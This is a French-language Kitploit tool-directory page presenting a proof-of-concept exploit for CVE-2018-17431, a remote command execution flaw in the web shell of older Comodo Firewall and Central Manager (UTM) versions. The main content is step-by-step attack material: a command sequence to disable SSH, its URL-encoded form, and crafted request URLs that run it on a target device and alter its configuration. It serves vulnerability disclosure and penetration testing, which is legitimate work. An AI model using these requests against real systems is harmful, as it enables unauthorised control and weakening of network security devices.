Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-17431-PoC — Proof of consept for CVE-2018-17431 | Kitploit
Outils/GitHubGitHub/fadavvi/cve-2018-17431-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolArchived
GitHubfadavvi/cve-2018-17431-poc

CVE-2018-17431-PoC

Proof of consept for CVE-2018-17431

Voir le dépôt
23il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-17431-PoC

Preuve de concept pour CVE-2018-17431

Titre de l'exploit : Comodo Firewall & Central Manager (UTM) Toutes versions avant 2.7.0 et 1.5.0 – Exécution de commandes à distance (basée sur Web Shell)

Auteur de l'exploit : Milad Fadavvi

Page du fournisseur : https://www.comodo.com/

Lien du logiciel : https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Version : antérieure à 2.7.0 et 1.5.0

Testé sur : Windows : firefox/chrome - Kali : firefox

Date de découverte : 2018-08-15 (signalé le même jour)

Confirmation que le bogue existe : 2018-09-22 (Ticket ID : XWR-503-79437)

Correctif publié : 2018-11-23 Notes de version de Comodo

Exploit :

  1. Simulation WebShell :

    root@kitploit:~
     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Encodage

    root@kitploit:~
     make above sequense encode with URL ECODING
     (j'ai utilisé le plugin Burp Encoder)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Exécuter

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Une page avec le message "Configuration has been altered" s'affichera et la configuration sera modifiée !

Avec cette technique, nous pouvons simuler toutes les commandes WebShell.

Télécharger l’outil